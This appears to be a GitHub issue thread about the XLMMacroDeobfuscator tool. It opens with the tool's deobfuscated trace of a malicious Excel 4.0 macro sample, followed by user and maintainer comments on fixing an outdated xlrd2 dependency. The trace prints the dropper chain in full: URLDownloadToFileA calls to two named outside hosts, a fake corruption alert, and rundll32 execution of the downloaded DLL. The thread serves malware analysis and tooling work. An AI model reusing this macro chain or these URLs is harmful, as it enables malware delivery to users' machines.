CELL:BS25984 , PartialEvaluation , WHILE("""C:\Users\Public\Qv7vo.reg""")
CELL:BS25985 , PartialEvaluation , WAIT(NOW()+"00:00:01")
CELL:BS25986 , PartialEvaluation , NEXT()
CELL:BS25987 , FullEvaluation , GOTO(CN21650)
CELL:CN21650 , FullEvaluation , "http://xn--80agatbmcgncccbd9andd6w.xn--p1ai/wp-smart.php"
CELL:CN21651 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BH56678)
CELL:BH56678 , FullEvaluation , "http://ekhobrand.com/wp-smart.php"
CELL:BH56679 , FullEvaluation , GOTO(DK4305)
CELL:DK4305 , PartialEvaluation , FOPEN("""C:\Users\Public\Qv7vo.reg""")
CELL:DK4306 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BZ16571)
CELL:BZ16571 , PartialEvaluation , FPOS("""""""C:\Users\Public\Qv7vo.reg""""""",215)
CELL:BZ16572 , FullEvaluation , GOTO(HE17768)
CELL:HE17768 , PartialEvaluation , FREAD("""""""C:\Users\Public\Qv7vo.reg""""""",255)
CELL:HE17769 , FullEvaluation , GOTO(DB17200)
CELL:DB17200 , PartialEvaluation , FCLOSE("""""""C:\Users\Public\Qv7vo.reg""""""")
CELL:DB17201 , FullEvaluation , GOTO(BG55116)
CELL:BG55116 , NotImplemented , FILE.DELETE(R[-8553]C[151])
CELL:BG55117 , FullEvaluation , GOTO(DX38285)
CELL:DX38285 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[-20517]C[85])),CLOSE(FALSE),)
CELL:DX38286 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GQ29178)
CELL:GQ29178 , FullEvaluation , "C:\Users\Public\DBoDYRP.html"
CELL:GQ29179 , FullEvaluation , GOTO(C7150)
CELL:C7150 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""","""C:\Users\Public\DBoDYRP.html""",0,0)
CELL:C7151 , FullEvaluation , GOTO(ES38374)
CELL:ES38374 , PartialEvaluation , FILES("""C:\Users\Public\DBoDYRP.html""")
CELL:ES38375 , FullEvaluation , GOTO(BN22175)
CELL:BN22175 , FullBranching , IF(ISERROR(R[16199]C[83]),CLOSE(FALSE),)
CELL:BN22175 , End , [TRUE] CLOSE(FALSE)
CELL:BN22175 , FullEvaluation , [FALSE]
CELL:BN22176 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!EK37835)
CELL:EK37835 , FullEvaluation , "C:\Users\Public\3HylL.html"
CELL:EK37836 , FullEvaluation , GOTO(C65411)
CELL:C65411 , FullEvaluation , "C:\Users\Public\3HylL.html",DllRegisterServer
CELL:C65412 , FullEvaluation , GOTO(DJ40917)
CELL:DJ40917 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""http://xn--80agatbmcgncccbd9andd6w.xn--p1ai/wp-smart.php""","""C:\Users\Public\3HylL.html""",0,0)
CELL:DJ40918 , FullEvaluation , GOTO(GU56285)
CELL:GU56285 , PartialEvaluation , FILES("""C:\Users\Public\3HylL.html""")
CELL:GU56286 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!AZ30462)
CELL:AZ30462 , FullBranching , IF(ISERROR(R[25823]C[151]),,RUN(R[-28301]C[128]))
CELL:AZ30462 , FullEvaluation , [TRUE]
CELL:AZ30463 , FullEvaluation , GOTO(EG21108)
CELL:EG21108 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""http://ekhobrand.com/wp-smart.php""","""C:\Users\Public\3HylL.html""",0,0)
CELL:EG21109 , FullEvaluation , GOTO(FX2161)
CELL:FX2161 , PartialEvaluation , ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",2)
CELL:FX2162 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GA23393)
CELL:GA23393 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","""C:\Users\Public\3HylL.html"",DllRegisterServer",0,5)
CELL:GA23394 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BC22382)
CELL:BC22382 , End , CLOSE(FALSE)
CELL:AZ30462 , FullEvaluation , [FALSE] RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!FX2161)
CELL:FX2161 , PartialEvaluation , ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",2)
CELL:FX2162 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!GA23393)
CELL:GA23393 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","""C:\Users\Public\3HylL.html"",DllRegisterServer",0,5)
CELL:GA23394 , FullEvaluation , RUN(MbN1jTM9PE9m097eYMH4qeGgJX3JZb!BC22382)
CELL:BC22382 , End , CLOSE(FALSE)
time elapsed: 1.9966199398040771Did you successfully install it on your mac?
if yes, I think now you should be able to use it without any problem. Are you facing any problem?
Note: please use --no-ms-excel
Maijin
commented
4 years ago 
doomedraven
commented
4 years ago @Maijin add -d 5(i don't see it in screen) i have tried that and it works, without that it doesn't
xlmdeobfuscator -2 -n -f Qi_7295.xls -d 5 <- this works on my mac
Maijin
commented
4 years ago 
Weird
DissectMalware
commented
4 years ago I tested the following xls on my mac: https://app.any.run/tasks/db6c055f-9308-461b-b69b-af067e5c30b3/#%20//content.any.run/tasks/db6c055f-9308-461b-b69b-af067e5c30b3/download/files/6e3bb0d6-ae8f-4272-9dd6-ae276005a627
What is your python version?
Maijin
commented
4 years ago After investigating, it appeared that xlrd2 wasn't up to date, maybe the version number was still the same one for both the old and new version 🤷♂️.
I had to manually purge it with pip3 uninstall xlrd2 and reinstall it and now it works.
Thanks for the assistance, appreciate it!
DissectMalware
commented
4 years ago That's great that you found the problem. That was a subtle bug! good catch.
Hello,
The following samples contains xlm macro not detected by XLMMacroDeobfuscator (but olevba does):
Qi_7295.xls.zip
via https://twitter.com/DynamicAnalysis/status/1257715735662596097